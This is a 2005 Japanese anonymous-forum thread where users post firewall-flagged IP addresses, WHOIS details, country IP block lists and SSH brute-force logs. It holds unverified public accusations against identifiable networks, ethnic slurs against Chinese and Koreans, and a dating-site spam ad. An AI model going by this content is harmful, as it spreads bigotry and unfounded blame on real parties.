1 :
名無しさん@お腹いっぱい。 :
2005/06/01(水) 01:50:32
2 :
名無しさん@お腹いっぱい。 :2005/06/01(水) 02:06:35
2
4 :
名無しさん@お腹いっぱい。 :2005/06/01(水) 03:50:02
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
>>216 スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
っても、池沼にゃ無理な相談か。。。
>>216 m9(^Д^)
5 :
名無しさん@お腹いっぱい。 :2005/06/01(水) 03:51:26
おまえらこのスレではどんな攻撃受けたか書け PING程度で攻撃されたーって騒いでIP晒すなカスども
7 :
名無しさん@お腹いっぱい。 :2005/06/01(水) 19:32:11
IPアドレス 210.251.5.247 ホスト名 G005247.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
8 :
名無しさん@お腹いっぱい。 :2005/06/01(水) 21:30:25
IPアドレス 210.251.51.45 ホスト名 G051045.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 山形県 市外局番 -- 接続回線 xDSL
9 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 09:41:37
カナダとブラジルからアクセスがありますた
10 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 20:21:08
助けてください! チャンコロが何度も不正アクセスしてきます。 IPアドレス 218.66.104.132
11 :
10 :2005/06/02(木) 20:35:25
同じくチャンコロからの不正アクセス IPアドレス61.152.158.152
13 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 23:47:01
ほとんどの不正ポートアクセスってPort135と445だけどさ これなんのウィルスなの? 個人がSMB/CIFS.にアクセスしてるようには思えないんだけど
>>6 つーかICMPはブロックしてるからPINGなんかこない
15 :
名無しさん@お腹いっぱい。 :2005/06/03(金) 10:42:43
チャンコロうぜーーーーーーーー 218.66.104.133 61.152.158.124 61.152.158.151 218.66.104.132 61.152.158.152 61.152.239.134
16 :
名無しさん@お腹いっぱい。 :2005/06/03(金) 14:26:07
IPアドレス 210.251.5.157 ホスト名 G005157.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
17 :
名無しさん@お腹いっぱい。 :2005/06/03(金) 14:32:52
IPアドレス 210.251.11.232 ホスト名 G011232.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 種別不明
18 :
名無しさん@お腹いっぱい。 :2005/06/03(金) 19:45:08
IPアドレス 202.221.174.142 ホスト名 bmdi2142.bmobile.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 Domain Information: [ドメイン情報] a. [ドメイン名] BMOBILE.NE.JP b. [ねっとわーくさーびすめい] にほんつうしん ねっとわーく c. [ネットワークサービス名] 日本通信ネットワーク
19 :
名無しさん@お腹いっぱい。 :2005/06/03(金) 20:07:17
IPアドレス 210.175.10.72 ホスト名 登録なし Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.175.10.64/27 b. [ネットワーク名] GAIAXNW f. [組織名] 株式会社ガイアックス g. [Organization] Gaiax.Co.,Ltd
20 :
名無しさん@お腹いっぱい。 :2005/06/03(金) 20:15:14
IPアドレス 202.156.137.131 ホスト名 cm131.gamma137.maxonline.com.sg IPアドレス 割当国 ※ シンガポール (SG)
>>6 攻撃なんていろいろ種類があるんだからそんなの気にしない
セキュリティソフトが不正アクセスだと言って来るから晒すだけの話
トロイだろうがスクリプトキディだろうが本物のハッカーだろうがどうでもいい、判断しない
本当に不正アクセスかどうかはともかく、とりあえずそれっぽい奴を全部晒しておけば問題ないだろうが
というか拒否するべき危険なIP群を本気で調べるなら、こんな所で調べずにWEB上のサイトで探すし このスレでは鬱陶しいIPを全部晒して拒否しておけばそれで間違いないよ 個人でPCを適当につかってる人が利用するスレなんだしその程度でじゅうぶん
なんか批判する香具師増えた気がするわけだが晒された奴か?
スレのあり方を改めて確認してる最中かと 俺も「うざいIPを全部晒すスレ」 に一票
25 :
名無しさん@お腹いっぱい。 :2005/06/04(土) 05:08:59
このスレに IP晒されて必死になってる チョンがいる予感w 不正侵入するお前が悪い
>>25 いやだからどんどん晒せばいいんだって
アホかお前w
それなりに危険だと思われる場合だけ詳しい注釈付にしとけばいいだろ どうでもいいような物なら、FWで拒否しようが放置しようが精神衛生上しか影響ないんだしこれまでどおりでいいよ
28 :
名無しさん@お腹いっぱい。 :2005/06/04(土) 08:34:55
IPアドレス 220.102.242.21 ホスト名 FLA1Add021.kng.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 xDSL a. [ドメイン名] MESH.AD.JP e. [そしきめい] にっぽんでんきかぶしきがいしゃ f. [組織名] 日本電気株式会社 g. [Organization] NEC Corporation
29 :
名無しさん@お腹いっぱい。 :2005/06/04(土) 11:18:36
IPアドレス 221.189.18.11 ホスト名 p6011-ipad202sapodori.hokkaido.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道 市外局番 -- 接続回線 xDSL
ルータとかではじいてないの? それともルータではじきましたログをわざわざはってんの?
バスター 445の穴 閉じてくれたかな? キーロガーとかウイルス、大陸から、まだいっぱい来てる? バスター全然駆除しないの直ったのかな?
32 :
名無しさん@お腹いっぱい。 :2005/06/04(土) 17:00:38
ほとんどの不正ポートアクセスってPort135と445だけどさ これなんのウィルスなの? 個人がSMB/CIFS.にアクセスしてるようには思えないんだけど
ワームと トロイの木馬(キーロガー)だって言ってるだろ。
歴史教科書 領土問題でも関係あるのかも。
35 :
名無しさん@お腹いっぱい。 :2005/06/04(土) 19:13:09
FWのログを見ると、不正アクセスしてくる相手のリストの中に 同じプロバイダ使ってる人がいっぱいいるんですが、 これは一体なぜなんですか? 同じプロバイダの人から一斉攻撃されてるみたいで何か恐いんですけど・・
>>35 不正アクセスしてくるIPは全部弾いておけばいいです
危険なのかどうかはプロ以外の人(というか管理者の人?)には判断できないようですが、
上の方とか見ると、全部弾いても一応は問題なさそうなので
送信番号No.029
100人中、29番目のお客様です。急な話ですが、
貴方はたった今からポイントを気にせずに自由に体験できる権利を獲得した29番目の男性様です。
これにより思う存分出会いを満喫する事が出来ます。詳しくは下記をご覧下さい。
利用方法につきましてご説明いたします。
◆まずはここにお入りください
http://koron-love.netfirms.com/top.html ━━━━━━━━━━━━━━━━━━━━━━━━━━
◆そして名前を記入し、PR文を書き込んでいただきます。
その時にに必ず【ドキドキ】とお書き込みください。
書き方は自由な感じで結構です、文の中に自然と織り交ぜるのもありですよ。
ここがポイントですので、絶対にお書き込みください。(例、初めてなのでドキドキしてます。等
※【ドキドキ】と記入していないと、他の一般ユーザーと同じに扱われてしまいますので必ずご記入ください。
(不安な方は【ドキドキ】とだけ記入していただければ結構です。)
◆その後、残りの項目を埋めてください。PCアドレス等を入れてしまえば完成です!
もちろん、住所等といったわずらわしい項目はございません。
※当たり前の話ではあるんですが一応ご報告させて頂きます。
登録して使わない状態でも月会費や維持費などは一切料金発生致しません。
ご安心下さい。
それでは、思う存分お楽しみください。
発送課 大竹
俺も同じプロパイダのIPからのポートスキャンが多いな
40 :
名無しさん@お腹いっぱい。 :2005/06/05(日) 13:27:33
IPアドレス 210.251.41.54 ホスト名 G041054.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 広島県 市外局番 082 接続回線 ダイヤルアップ
41 :
名無しさん@お腹いっぱい。 :2005/06/05(日) 19:42:48
IPアドレス 211.13.215.96 ホスト名 ad011.naturalidentity.com IPアドレス 割当国 ※ 日本 (JP) a. [IPネットワークアドレス] 211.13.215.64/26 b. [ネットワーク名] NA-IDENTITY f. [組織名] 株式会社ナチュラルアイデンティティー g. [Organization] Natural Identity ソフトウェア開発や販売、広告メディア開発をしている 株式会社ナチュラルアイデンティティー様が、俺に何か用ですか? もう50回攻撃されているのですが・・・・・・・・・・
42 :
名無しさん@お腹いっぱい。 :2005/06/05(日) 22:18:41
>>41 オレは攻撃してきたIPから日立の某研究所とふんで、管理人にメールした。
すると、攻撃してきた時間帯に、オレ宛にパケットは出てないって電話して
きて弁明してた。
IP偽造して攻撃するのって高度じゃないの? それともばっくれられた?
43 :
名無しさん@お腹いっぱい。 :2005/06/05(日) 22:28:21
24.185.150.220.ap.yournet.ne.jp テストしてんだろw
p4208-ipad05kamokounan.kagoshima.ocn.ne.jp
>>42 IP偽装は簡単だぞ
nmapでもそのオプションがあるからプログラミングなんかせんでもいいし
Windows系のOSはrawsockを使えないように最近したからUNIXじゃないといけないけど
46 :
名無しさん@お腹いっぱい。 :2005/06/05(日) 23:52:19
207.46.107.46 baym-cs246.msgr.hotmail.com アメリカ合衆国 (US) これはどう?
IPアドレス 221.185.163.208 ホスト名 p4208-ipad05kamokounan.kagoshima.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 鹿児島県 市外局番 -- 接続回線 xDSL
210.154.158.100 210.154.158.179 ネットワーク名 RYUCOM 組織名 株式会社リウコム 最初にネットワークウィルス送って、その後SVCHOSTってパターン。 忘れた頃に繰り返しやってくるが、しつこいねえ・・・
>>46 お前の目が腐ってるという証明にはなってるな。
中国134.196.0.0 134.196.255.255 中国159.226.0.0 159.226.255.255 中国162.105.0.0 162.105.255.255 中国166.111.0.0 166.111.255.255 中国167.139.0.0 167.139.255.255 中国168.160.0.0 168.160.255.255 中国202.0.110.0 202.0.110.255 中国202.0.160.0 202.0.179.255 中国202.3.77.0 202.3.77.255 中国202.4.128.0 202.4.159.255 中国202.14.88.0 202.14.88.255 中国202.14.235.0 202.14.238.255 中国202.20.120.0 202.20.120.255 中国202.22.248.0 202.22.255.255 中国202.38.0.0 202.38.15.255 中国202.38.64.0 202.38.138.255 中国202.38.140.0 202.38.147.255 中国202.38.149.0 202.38.156.255 中国202.38.158.0 202.38.161.255 中国202.38.164.0 202.38.177.255 中国202.38.184.0 202.38.255.255 中国202.90.0.0 202.90.3.255 中国202.90.252.0 202.91.3.255 中国202.91.128.0 202.91.131.255 中国202.92.0.0 202.92.3.255 中国202.92.252.0 202.93.3.255
中国202.93.252.0 202.94.31.255 中国202.95.0.0 202.95.31.255 中国202.95.252.0 202.122.7.255 中国202.122.32.0 202.122.39.255 中国202.122.128.0 202.122.128.255 中国202.127.0.0 202.127.7.255 中国202.127.12.0 202.127.31.255 中国202.127.40.0 202.127.63.255 中国202.127.128.0 202.127.167.255 中国202.127.192.0 202.127.223.255 中国202.127.240.0 202.127.255.255 中国202.130.0.0 202.130.31.255 中国202.130.224.0 202.130.255.255 中国202.131.208.0 202.131.223.255 中国202.148.96.0 202.148.127.255 中国202.168.160.0 202.168.175.255 中国202.192.0.0 202.207.255.255 中国203.79.0.0 203.79.15.255 中国203.81.16.0 203.81.31.255 中国203.87.224.0 203.88.3.255 中国203.89.0.0 203.89.3.255 中国203.90.0.0 203.90.3.255 中国203.91.0.0 203.91.3.255 中国203.92.0.0 203.92.3.255 中国203.93.0.0 203.94.31.255 中国203.95.0.0 203.95.7.255
中国203.128.128.0 203.128.159.255 中国203.148.0.0 203.148.63.255 中国203.175.128.0 203.175.159.255 中国203.175.192.0 203.175.255.255 中国203.192.0.0 203.192.31.255 中国203.196.0.0 203.196.7.255 中国203.207.64.0 203.208.19.255 中国203.212.0.0 203.212.15.255 中国203.222.192.0 203.222.207.255 中国203.223.0.0 203.223.15.255 中国210.5.0.0 210.5.31.255 中国210.5.128.0 210.5.143.255 中国210.12.0.0 210.13.255.255 中国210.14.64.0 210.14.95.255 中国210.14.160.0 210.15.191.255 中国210.21.0.0 210.22.255.255 中国210.25.0.0 210.47.255.255 中国210.51.0.0 210.53.255.255 中国210.72.0.0 210.78.255.255 中国210.79.224.0 210.79.255.255 中国210.82.0.0 210.83.255.255 中国210.87.128.0 210.87.143.255 中国210.192.96.0 210.192.127.255 中国210.211.0.0 210.211.15.255 中国211.64.0.0 211.71.255.255 中国211.80.0.0 211.103.255.255
中国211.136.0.0 211.167.255.255 中国218.0.0.0 218.31.255.255 中国218.56.0.0 218.99.255.255 中国218.104.0.0 218.109.255.255 中国218.192.0.0 218.207.255.255 中国218.240.0.0 218.247.255.255 中国219.72.0.0 219.72.255.255 中国219.82.0.0 219.82.255.255 中国219.128.0.0 219.159.255.255 中国219.216.0.0 219.239.255.255 中国219.242.0.0 219.247.255.255 中国220.112.0.0 220.115.255.255 中国220.160.0.0 220.207.255.255 中国220.248.0.0 220.252.255.255 中国221.0.0.0 221.7.95.255 中国221.7.128.0 221.11.223.255 中国221.12.0.0 221.12.191.255 中国221.13.0.0 221.13.95.255 中国221.13.128.0 221.15.255.255 中国221.122.0.0 221.123.255.255 中国221.129.0.0 221.131.255.255 中国221.136.0.0 221.137.255.255 中国221.172.0.0 221.183.255.255 中国221.192.0.0 221.194.255.255 中国221.196.0.0 221.199.47.255 中国221.199.128.0 221.199.207.255
中国221.200.0.0 221.205.255.255 中国221.207.0.0 221.207.63.255 中国221.208.0.0 221.212.255.255 中国221.214.0.0 221.239.255.255 中国222.16.0.0 222.73.255.255 中国222.76.0.0 222.84.255.255 中国222.85.128.0 222.87.255.255 中国222.128.0.0 222.143.255.255 中国222.160.0.0 222.163.31.255 中国61.4.64.0 61.4.79.255 中国61.28.0.0 61.28.127.255 中国61.48.0.0 61.55.255.255 中国61.128.0.0 61.191.255.255 中国61.232.0.0 61.237.255.255 中国61.240.0.0 61.243.255.255 香港134.159.0.0 134.159.255.255 香港143.89.0.0 143.89.255.255 香港144.214.0.0 144.214.255.255 香港147.8.0.0 147.8.255.255 香港158.132.0.0 158.132.255.255 香港158.182.0.0 158.182.255.255 香港165.202.0.0 165.202.255.255 香港165.222.0.0 165.222.255.255 香港166.81.0.0 166.81.255.255 香港168.70.0.0 168.70.255.255 香港168.106.0.0 168.106.255.255
香港202.0.77.0 202.0.78.255 香港202.0.100.0 202.0.100.255 香港202.0.104.0 202.0.104.255 香港202.0.112.0 202.0.112.255 香港202.0.122.0 202.0.123.255 香港202.0.128.0 202.0.147.255 香港202.0.181.0 202.0.183.255 香港202.1.6.0 202.1.7.255 香港202.2.32.0 202.2.51.255 香港202.2.64.0 202.2.87.255 香港202.3.6.0 202.3.7.255 香港202.4.26.0 202.4.27.255 香港202.4.192.0 202.4.223.255 香港202.5.16.0 202.5.31.255 香港202.6.0.0 202.6.1.255 香港202.6.94.0 202.6.94.255 香港202.6.192.0 202.6.207.255 香港202.7.128.0 202.7.143.255 香港202.8.88.0 202.8.91.255 香港202.8.93.0 202.8.93.255 香港202.12.4.0 202.12.7.255 香港202.14.67.0 202.14.68.255 香港202.14.80.0 202.14.80.255 香港202.14.222.0 202.14.222.255 香港202.20.66.0 202.20.66.255 香港202.20.88.0 202.20.89.255
香港202.20.94.0 202.20.95.255 香港202.20.98.0 202.20.98.255 香港202.20.100.0 202.20.101.255 香港202.20.111.0 202.20.111.255 香港202.20.117.0 202.20.118.255 香港202.20.125.0 202.20.127.255 香港202.38.16.0 202.38.31.255 香港202.38.178.0 202.38.179.255 香港202.40.0.0 202.40.5.255 香港202.40.7.0 202.40.162.255 香港202.40.164.0 202.40.171.255 香港202.40.192.0 202.40.223.255 香港202.45.0.0 202.45.2.255 香港202.45.4.0 202.45.5.255 香港202.45.8.0 202.45.9.255 香港202.45.15.0 202.45.95.255 香港202.45.128.0 202.45.128.255 香港202.45.160.0 202.45.255.255 香港202.52.128.0 202.52.159.255 香港202.52.192.0 202.52.223.255 香港202.53.128.0 202.53.159.255 香港202.57.192.0 202.57.223.255 香港202.57.240.0 202.57.255.255 香港202.60.224.0 202.60.255.255 香港202.61.96.0 202.61.127.255 香港202.62.192.0 202.62.223.255
香港202.63.0.0 202.63.31.255 香港202.63.128.0 202.63.159.255 香港202.64.0.0 202.65.9.255 香港202.65.96.0 202.65.111.255 香港202.65.160.0 202.65.175.255 香港202.65.192.0 202.65.223.255 香港202.65.248.0 202.67.3.255 香港202.67.128.0 202.68.63.255 香港202.68.96.0 202.68.127.255 香港202.68.192.0 202.68.207.255 香港202.68.224.0 202.69.3.255 香港202.69.64.0 202.69.95.255 香港202.69.128.0 202.69.131.255 香港202.69.240.0 202.70.31.255 香港202.70.160.0 202.70.175.255 香港202.71.0.0 202.71.31.255 香港202.71.192.0 202.72.31.255 香港202.72.252.0 202.73.3.255 香港202.73.128.0 202.73.131.255 香港202.73.240.0 202.74.3.255 香港202.74.80.0 202.74.127.255 香港202.74.254.0 202.75.3.255 香港202.75.64.0 202.75.95.255 香港202.75.252.0 202.76.127.255 香港202.76.252.0 202.77.63.255 香港202.77.128.0 202.78.7.255
わざわざ書かんでもこの板の住人なら最新情報をすぐ調べられると思うが。 ってかできない奴はもぐり。
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
>>50-57 スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
>>50-57 m9(^Д^)プギャー
60 :
名無しさん@お腹いっぱい。 :2005/06/06(月) 19:51:13
IPアドレス 202.216.122.11 ホスト名 fc122-011.infoaomori.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 青森県 市外局番 -- 接続回線 種別不明 a. [ドメイン名] INFOAOMORI.NE.JP b. [ねっとわーくさーびすめい] いんふぉあおもり
61 :
名無しさん@お腹いっぱい。 :2005/06/06(月) 20:51:13
IPアドレス 220.151.241.16 ホスト名 usen-220x151x241x16.ap-US00.usen.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光
62 :
名無しさん@お腹いっぱい。 :2005/06/07(火) 03:14:27
IPアドレス 220.151.241.16 ホスト名 usen-220x151x241x16.ap-US00.usen.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光 Domain Information: [ドメイン情報] a. [ドメイン名] USEN.AD.JP e. [そしきめい] かぶしきかいしゃゆーずこみゅにけーしょんず f. [組織名] 株式会社ユーズコミュニケーションズ
DIQN愛用の犯罪者IP一覧 219.108.49.44 219.108.49.0 - 219.108.49.255 218.222.107.27 218.222.104.0 - 218.222.127.255 219.108.180.254 219.108.180.0 - 219.108.180.255 221.119.135.56 221.119.135.0 - 221.119.135.255 210.238.160.86 210.238.160.0 - 210.238.160.255 219.125.213.80 219.125.213.0 - 219.125.213.255 218.222.7.189 218.222.0.0 - 218.222.15.255 219.108.68.202 219.108.68.0 - 219.108.68.255 219.125.126.99 219.125.126.0 - 219.125.126.255 219.108.167.86 219.108.160.0 - 219.108.175.255 220.217.120.179 220.217.120.0 - 220.217.120.255 210.255.20.116 210.255.20.0 - 210.255.23.255 210.238.172.129 210.238.172.0 - 210.238.172.255 220.217.112.84 220.217.112.0 - 220.217.112.255 219.125.100.190 219.125.100.0 - 219.125.100.255 219.108.164.4 219.108.160.0 - 219.108.175.255 220.217.104.110 220.217.104.0 - 220.217.104.255
64 :
名無しさん@お腹いっぱい。 :2005/06/07(火) 17:48:43
DIQN愛用の犯罪者IP一覧(つづき) 61.198.248.46 61.198.248.0 - 61.198.255.255 61.117.78.227 61.117.78.0 - 61.117.78.255 218.222.96.189 218.222.72.0 - 218.222.103.255 211.134.131.28 211.134.92.0 - 211.134.144.255 210.230.151.76 210.230.151.0 - 210.230.151.255 210.234.0.126 210.234.0.0 - 210.234.104.255 211.134.228.74 211.134.200.0 - 211.134.247.255 218.222.151.48 218.222.136.0 - 218.222.151.255 210.255.40.190 210.255.32.0 - 210.255.47.255 61.204.105.161 61.204.105.0 - 61.204.105.255 210.196.43.20 210.196.43.0 - 210.196.43.255 61.198.199.243 61.192.0.0 - 61.199.255.255 220.217.174.186 220.217.174.0 - 220.217.174.255 210.234.96.204 210.234.0.0 - 210.234.104.255 211.126.123.33 211.126.123.0 - 211.126.123.255 220.217.133.245 220.217.133.0 - 220.217.133.255←トロイ仕込まれてる馬鹿 219.125.181.98 219.125.181.0 - 219.125.181.255 219.125.107.31 219.125.107.0 - 219.125.107.255 219.125.62.107 219.125.62.0 - 219.125.62.255
65 :
名無しさん@お腹いっぱい。 :2005/06/07(火) 21:09:37
IPアドレス 202.231.174.203 ホスト名 fi-202231174-203.urban.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 フレッツISDN
誰か助けてくれー!! マジレスキボンヌ! なんとかしてくれー!! 顧客情報全部無くなってしまった。 ログファイル消された。 レジストリ書き換えられた。 バックドア仕込まれた。 ちなみに回線はADSL回線。 サーバーの管理者なんですけど、ハッカー侵入されて困っています。誰かなんとかしてください。
>>66 現在の管理者を解雇、最低でも担当から外す事が第一歩かな。
68 :
名無しさん@お腹いっぱい。 :2005/06/08(水) 09:34:18
445ばっか突いてくんじゃねーよ!ボケ 市ね IPアドレス 202.67.18.36 ホスト名 opt-202-67-18-36.client.pikara.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛媛県 市外局番 -- 接続回線 光
>>66 侵入されたオマエがへたれ管理人だったってこと。
侵入されて何とかしてくれったって手後れ。
まずおまえは管理人から外れて、後釜にサーバ管理に強い奴を入れろ。
侵入されたサーバは完全に初期化して、もう一度構築だ。
ついでにネット繋がってるサーバに顧客情報を置くバカいるかw
70 :
名無しさん@お腹いっぱい。 :2005/06/08(水) 18:04:04
バカタント、あーバカタント、バカタント IPアドレス 202.231.112.30 ホスト名 wd30.BFLb1.vectant.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光
71 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 03:41:29
犯罪者御用達プロバDIQNのユーザーさんです。 210.239.250.95
73 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 11:34:10
IPアドレス 210.251.73.249 ホスト名 登録なし Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.251.73.240/28 b. [ネットワーク名] TOKYOSOFT f. [組織名] 東京ソフト株式会社 g. [Organization] Tokyo Soft Co.,Ltd.
74 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 11:43:29
いまだにbrutesshでアタックしてくる、やられたサーバー多いっすね。
75 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 12:10:15
こんな感じ? SSH Failed logins from these*1 admin/password from xxx.xxx.xxx.xxx: 4 Time(s) guest/password from xxx.xxx.xxx.xxx: 2 Time(s) root/password from xxx.xxx.xxx.xxx: 6 Time(s) test/password from xxx.xxx.xxx.xxx: 4 Time(s) user/password from xxx.xxx.xxx.xxx: 2 Time(s)
76 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 12:48:32
IPアドレス 210.251.14.66 ホスト名 G014066.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 種別不明
77 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 13:37:09
ノートンが反応したんですがこれは何でしょうか? 侵入: HTTP_ActivePerl_Overflow,"侵入: HTTP_ActivePerl_Overflow 侵入者: localhost(1907) 危険度: 中レベル プロトコル: TCP 攻撃された IP: pagead2.googlesyndication.com(216.239.63.104) 攻撃された ポート: http(80)"
お前がTCPプロトコルで216.239.63.104を使って、gooのHTTP80を攻撃した! 侵入者: →localhost(1907)=藻前だ!!
80 :
名無しさん@お腹いっぱい。 :2005/06/09(木) 15:30:58
>>75 そう。
/etc/hosts.denyで閉じてしまえば1回きりだからなんでもないんですけど、
研究のためもあってサーバ1台だけ開けてるんですよ。
(ただし/etc/pam.d/sshdと/etc/security/access.confでユーザ制限は掛けてます)
そうすると、brutesshの派生版で1000通りのユーザを試すのもあったり。
以前はIPチェックして、日本国内の企業サーバだったら知らせてあげたりもしてたんですけど、
みなさんどうされてます?ここでさらすだけ?
81 :
名無しさん@お腹いっぱい。 :2005/06/10(金) 20:02:01
IPアドレス 202.231.123.199 ホスト名 wd30.BFLb1.vectant.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光
82 :
名無しさん@お腹いっぱい。 :2005/06/11(土) 01:54:40
最近は国内からも来るんだな Jun 10 19:18:34 fsx01 sshd[3047]: Did not receive identification string from 58.1.156.159 Jun 10 19:25:28 fsx01 sshd[3261]: Illegal user admin from 58.1.156.159 *中略* Jun 10 19:29:54 fsx01 sshd[5490]: Illegal user pvm from 58.1.156.159
83 :
名無しさん@お腹いっぱい。 :2005/06/11(土) 02:26:35
今リアルでハックされたっぽ(´・ω・`) カーソルがぐちゃぐちゃに動きだしたり勝手にアプリ起動したり。 ノートン先生無反応でした(´・ω・`)
84 :
名無しさん@お腹いっぱい。 :2005/06/11(土) 03:58:09
ゆうべからTransScoutってのが5回も来たんだけど
85 :
名無しさん@お腹いっぱい。 :2005/06/11(土) 11:32:02
210.157.21.145 210.157.21.146 210.157.21.151 210.157.21.152 IPアドレス割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
86 :
名無しさん@お腹いっぱい。 :2005/06/11(土) 12:49:59
最近アタックが来ない。 (´・ω・`)
攻撃されて防がないと進入されているのかと心配になるんだが・・・
ノートンが反応しなかったら 進入されてるかどうか分からん・・・・ これってヤバイ?
不正アクセスってどうやってわかるんですか?
90 :
名無しさん@お腹いっぱい。 :2005/06/11(土) 22:42:39
59.148.29.127 いろいろなポート叩きにきてバスターがブロックしまくり… inetnum: 59.148.0.0 - 59.149.255.255 descr: Internet Service Provider in Hong Kong country: HK
brutesshうざい。 研究用にポート自体は開けてあるのだが、 うざすぎなのでJPNIC管轄エリア以外を閉めました。 JPNIC管轄エリアの指定が何十行にもなるのがちょっと。 sshd: Authentication Failures: unknown (210.180.180.2): 2785 Time(s) root (210.180.180.2): 138 Time(s) unknown (210.72.228.43): 133 Time(s) admin (210.180.180.2): 64 Time(s) root (210.72.228.43): 34 Time(s) admin (210.72.228.43): 14 Time(s) apache (210.180.180.2): 7 Time(s) news (210.180.180.2): 3 Time(s) apache (210.72.228.43): 2 Time(s) ftp (210.72.228.43): 2 Time(s) games (210.72.228.43): 2 Time(s) mail (210.72.228.43): 2 Time(s) news (210.72.228.43): 2 Time(s) nobody (210.72.228.43): 2 Time(s) adm (210.72.228.43): 1 Time(s) bin (210.180.180.2): 1 Time(s) mail (210.180.180.2): 1 Time(s) nobody (210.180.180.2): 1 Time(s) operator (210.72.228.43): 1 Time(s) sshd (210.72.228.43): 1 Time(s) support (210.180.180.2): 1 Time(s) Invalid Users: Unknown Account: 2918 Time(s)
92 :
名無しさん@お腹いっぱい。 :2005/06/12(日) 15:04:40
IPアドレス 60.35.66.244 ホスト名 i60-35-66-244.s02.a014.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 xDSL いつもチャイニーが攻撃してくるのに、初めて神奈川県だった。 なんだこいつ
IPアドレス 206.223.154.240 ホスト名 tiger2514.maido3.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ポートスキャンうざい
94 :
名無しさん@お腹いっぱい。 :2005/06/12(日) 16:23:19 BE:125316083-
IPアドレス 211.2.124.136 ホスト名 ntsitm091136.sitm.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
>>93 2chの串チェック用ポートスキャンです。嫌なら書き込まずにROMしとけ。
>>94 ,95
2chのサーバーって、さいたまなんだ…
97 :
名無しさん@お腹いっぱい。 :2005/06/12(日) 21:01:38
2005/06/10 17:42:50: TCP port scan 202.231.141.107 > 169.254.0.2 2005/06/10 17:43:55: TCP port scan 202.231.141.107 > 169.254.0.2 2005/06/11 04:41:13: TCP port scan 66.55.29.236 > 169.254.0.2 2005/06/11 11:11:49: TCP port scan 218.66.104.139 > 169.254.0.2 2005/06/11 11:30:53: TCP port scan 220.210.11.218 > 169.254.0.2 2005/06/12 09:26:59: TCP port scan 202.157.224.230 > 169.254.0.2 2005/06/12 20:55:08: TCP port scan 61.152.158.123 > 169.254.0.2 2005/06/12 20:57:29: TCP port scan 61.152.158.123 > 169.254.0.2
98 :
名無しさん@お腹いっぱい。 :2005/06/12(日) 22:13:31
いつもネットに接続した瞬間に攻撃される(´・ω・) いい加減ウザス
IPアドレス 221.188.109.151 ホスト名 p4151-ipbf208souka.saitama.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光 soukaってあの層化じゃないよね?
2ちゃんのサーバは米にあるってはなし....
>>96 がなぜか>94を2chの串チェックと勘違いしてるところで間違ってるんだけど。
串チェックは
>>93 。
>>94 は全く関係なし。
tiger2514.maido3.comは2chの鯖。
ちなみにtiger2514.maido3.comはanime.2ch.net [206.223.154.240]。
>>100 草加せんべいで有名な埼玉県草加市からの接続でしょ。
103 :
名無しさん@お腹いっぱい。 :2005/06/13(月) 10:38:15
IPアドレス 202.231.174.45 ホスト名 fi-202231174-45.urban.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 フレッツISDN
104 :
名無しさん@お腹いっぱい。 :2005/06/13(月) 11:32:27
>>98 うちもそうだ。
こういう攻撃とかって詳しくわからないんだけど
攻撃相手はランダムに攻撃する人選んでるの?誰か教えて
105 :
バカタント、あーバカタント、バカタント :2005/06/13(月) 13:03:10
バカタント、あーバカタント、バカタント IPアドレス 202.231.174.45 ホスト名 fi-202231174-45.urban.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 フレッツISDN
106 :
名無しさん@お腹いっぱい。 :2005/06/13(月) 21:08:31
>>104 Ping打ちまくって反応のあったところに集中的に流したり、
特定範囲のIP狙い打ちしたり。
